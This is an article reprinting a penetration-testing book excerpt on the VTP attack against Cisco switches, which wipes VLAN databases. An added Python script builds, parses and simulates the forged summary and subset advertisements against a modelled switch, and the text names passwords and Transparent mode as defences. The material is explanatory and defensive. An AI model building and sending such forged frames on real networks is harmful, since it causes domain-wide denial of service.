The VLAN Trunking Protocol (VTP) is a Cisco management protocol that reduces the amount of VLAN configuration needed in a switched environment. With VTP, a switch can be a VTP Server, VTP Client, or VTP Transparent switch. VTP Transparent switches do not participate in VTP (they only forward advertisements), so the discussion here focuses on Server and Client. Using VTP, you configure all your VLAN declarations on a switch operating in VTP Server mode. Any time you make a change, whether it is the addition, modification, or removal of a VLAN, the VTP configuration revision number increments by one and the server advertises the new database across its trunk links. When a VTP Client (or another Server in the same VTP domain) sees an advertisement whose configuration revision number is greater than its own, it synchronizes to that database. The example below shows the output of the show vtp status command, which illustrates both the configuration revision number and the VTP mode of a switch.
Cat2950#show vtp status
VTP Version                     : 2
Configuration Revision          : 4
Maximum VLANs supported locally : 68
Number of existing VLANs        : 6
VTP Operating Mode              : Server
VTP Domain Name                 : HackMyNetwork
VTP Pruning Mode                : Enabled
VTP V2 Mode                     : Disabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0x3D 0x02 0xD4 0x3A 0xC4 0x46 0xA1 0x03
Configuration last modified by 10.1.1.40 at 5-4-02 22:25:
A malicious hacker can use VTP to his advantage to remove all VLANs (except the default VLANs) from every switch in the VTP domain. This allows the malicious hacker to be on the same VLAN as every other user. The users might still be on separate IP networks, however, so the malicious hacker would need to change his IP address to be on the same network as the host he wants to attack. A practitioner should also expect a blunter outcome: on Catalyst switches, an access port whose VLAN has been deleted from the database goes inactive rather than falling back to VLAN 1, so the most immediate effect of wiping the VLAN database is a network-wide denial of service.
A malicious hacker exploits VTP to his advantage by connecting to a switch and establishing a trunk between his computer and the switch, because VTP advertisements are carried only across trunk links. (See the earlier VLAN Hopping section for more on establishing a trunk.) The malicious hacker then sends a VTP summary advertisement for the target's VTP domain with a configuration revision number higher than the current VTP Server's, followed by a subset advertisement that lists no VLANs. Every Server and Client switch in the domain sees the higher revision and synchronizes with the computer of the malicious hacker, which removes all nondefault VLANs from their VLAN databases. Two conditions must hold for the forged advertisement to be accepted: it must carry the domain name shown in show vtp status, and if a VTP password is configured, its MD5 digest must have been computed with that password. A VTP password, and running switches in Transparent mode where VTP is not needed, therefore blunt the attack.

From Penetration Testing and Network Defense, by Andrew Whitaker and Daniel Newman. Chapter 10, pp. 333-337 - Cisco Press. Reprinted with permission.
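The exchange described above, as an added example that is not code from the book or from the article: a Python script that builds the VTP summary and subset advertisements an attacker would send, parses them as a switch would, and models the accept-or-ignore decision a Server or Client switch makes (domain must match, revision must be higher, Transparent mode ignores everything). The domain name, revision numbers, VLAN names, MAC and IP addresses are constructed for the example; the MD5 digest check that a real switch performs (and that a VTP password feeds into) is noted in the code but deliberately not implemented.

```python
"""Build, parse and act on VTP summary/subset advertisements (constructed example, not from the book)."""
import struct

VTP_DST_MAC = bytes.fromhex("01000ccccccc")          # multicast MAC all VTP frames are sent to
VTP_SNAP_OUI, VTP_SNAP_PID = bytes.fromhex("00000c"), 0x2003
SUMMARY_ADVERT, SUBSET_ADVERT, VLAN_TYPE_ETHERNET = 0x01, 0x02, 1
# VLANs 1 and 1002-1005 always exist on a Catalyst switch and cannot be deleted.
DEFAULT_VLANS = {1: "default", 1002: "fddi-default", 1003: "token-ring-default",
                 1004: "fddinet-default", 1005: "trnet-default"}

def _domain_field(domain):
    raw = domain.encode("ascii")
    if len(raw) > 32:
        raise ValueError("VTP domain names are at most 32 bytes")
    return len(raw), raw.ljust(32, b"\x00")

def build_summary_advert(domain, revision, followers=1, updater_ip="10.1.1.40",
                         timestamp=b"020504222500", digest=bytes(16), version=1):
    """72-byte summary advertisement: header, domain, revision, updater IP, timestamp, MD5."""
    dlen, dfield = _domain_field(domain)
    updater = bytes(int(o) for o in updater_ip.split("."))
    return (struct.pack("!BBBB", version, SUMMARY_ADVERT, followers, dlen) + dfield
            + struct.pack("!I", revision) + updater + timestamp[:12].ljust(12, b"0") + digest[:16])

def build_subset_advert(domain, revision, vlans, seq=1, version=1):
    """Subset advertisement with one VLAN info field per VLAN; an empty dict yields none."""
    dlen, dfield = _domain_field(domain)
    out = struct.pack("!BBBB", version, SUBSET_ADVERT, seq, dlen) + dfield + struct.pack("!I", revision)
    for vid, name in sorted(vlans.items()):
        raw = name.encode("ascii")
        padded = raw.ljust((len(raw) + 3) // 4 * 4, b"\x00")   # name is padded to a 4-byte multiple
        out += struct.pack("!BBBBHHI", 12 + len(padded), 0, VLAN_TYPE_ETHERNET,   # len, status, type
                           len(raw), vid, 1500, 100000 + vid) + padded            # name len, ID, MTU, SAID
    return out

def wrap_frame(src_mac, payload):
    """802.3 frame with LLC/SNAP (OUI 00:00:0c, PID 0x2003), as the advertisement travels on a trunk."""
    llc_snap = b"\xaa\xaa\x03" + VTP_SNAP_OUI + struct.pack("!H", VTP_SNAP_PID)
    return VTP_DST_MAC + src_mac + struct.pack("!H", len(llc_snap) + len(payload)) + llc_snap + payload

def parse_summary_advert(data):
    if len(data) != 72 or data[1] != SUMMARY_ADVERT:
        raise ValueError("not a VTP summary advertisement")
    version, _, followers, dlen = struct.unpack("!BBBB", data[:4])
    return {"version": version, "followers": followers, "domain": data[4:4 + dlen].decode("ascii"),
            "revision": struct.unpack("!I", data[36:40])[0],
            "updater": ".".join(str(b) for b in data[40:44]),
            "timestamp": data[44:56].decode("ascii", "replace"), "digest": data[56:72]}

def parse_subset_advert(data):
    if len(data) < 40 or data[1] != SUBSET_ADVERT:
        raise ValueError("not a VTP subset advertisement")
    _, _, seq, dlen = struct.unpack("!BBBB", data[:4])
    vlans, pos = {}, 40
    while pos < len(data):                                    # walk the variable-length VLAN info fields
        if pos + 12 > len(data):
            raise ValueError("truncated VLAN info field")
        length, _status, _vtype, nlen, vid, _mtu, _said = struct.unpack("!BBBBHHI", data[pos:pos + 12])
        if length < 12 + nlen or pos + length > len(data):
            raise ValueError("bad VLAN info field length")
        vlans[vid] = data[pos + 12:pos + 12 + nlen].decode("ascii")
        pos += length
    return {"seq": seq, "domain": data[4:4 + dlen].decode("ascii"),
            "revision": struct.unpack("!I", data[36:40])[0], "vlans": vlans}

class VtpSwitch:
    """Minimal model of how a Server or Client switch decides whether to synchronize."""
    def __init__(self, hostname, domain, mode="client", revision=0, vlans=None):
        self.hostname, self.domain, self.mode, self.revision = hostname, domain, mode, revision
        self.vlans = {**DEFAULT_VLANS, **(vlans or {})}

    def receive(self, summary_bytes, subset_bytes):
        """Process one summary+subset pair and return what the switch did and why."""
        if self.mode == "transparent":
            return "ignored: transparent mode only forwards advertisements"
        summary = parse_summary_advert(summary_bytes)
        if summary["domain"] != self.domain:
            return f"ignored: domain {summary['domain']!r} is not {self.domain!r}"
        if summary["revision"] <= self.revision:
            return f"ignored: revision {summary['revision']} is not above local revision {self.revision}"
        # A real switch also verifies summary["digest"], an MD5 over the advertised database and the
        # VTP password if one is set; that check is deliberately not modelled here.
        subset = parse_subset_advert(subset_bytes)
        if subset["domain"] != self.domain or subset["revision"] != summary["revision"]:
            return "ignored: subset advertisement does not match the summary"
        self.vlans = {**DEFAULT_VLANS, **subset["vlans"]}     # higher revision replaces the whole database
        self.revision = summary["revision"]
        return f"synchronized to revision {self.revision} from {summary['updater']}"

def demo_attack():
    """Client at revision 4 with VLANs 10 and 20 receives a forged revision-5 advertisement with no VLANs."""
    domain, prod = "HackMyNetwork", {10: "users", 20: "servers"}
    client = VtpSwitch("Cat2950-access", domain, "client", revision=4, vlans=prod)
    attacker_mac = bytes.fromhex("0242c0a80164")              # constructed attacker MAC address
    frames = [wrap_frame(attacker_mac, build_summary_advert(domain, 5, updater_ip="10.1.1.200")),
              wrap_frame(attacker_mac, build_subset_advert(domain, 5, {}))]
    outcome = client.receive(*(f[22:] for f in frames))      # strip 14-byte 802.3 + 8-byte LLC/SNAP
    return outcome, sorted(client.vlans)
```

Calling demo_attack() returns the client's decision ("synchronized to revision 5 from 10.1.1.200") together with the surviving VLAN IDs, which are only the defaults 1 and 1002-1005. Changing the domain in the forged frames to anything other than the one shown in show vtp status, or setting the client's mode to "transparent", makes receive() return an "ignored" reason and leaves VLANs 10 and 20 in place, which is exactly why the domain name and a VTP password (the digest check the model leaves out) are the attacker's two obstacles.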
This article was first published on EnterpriseITPlanet.com.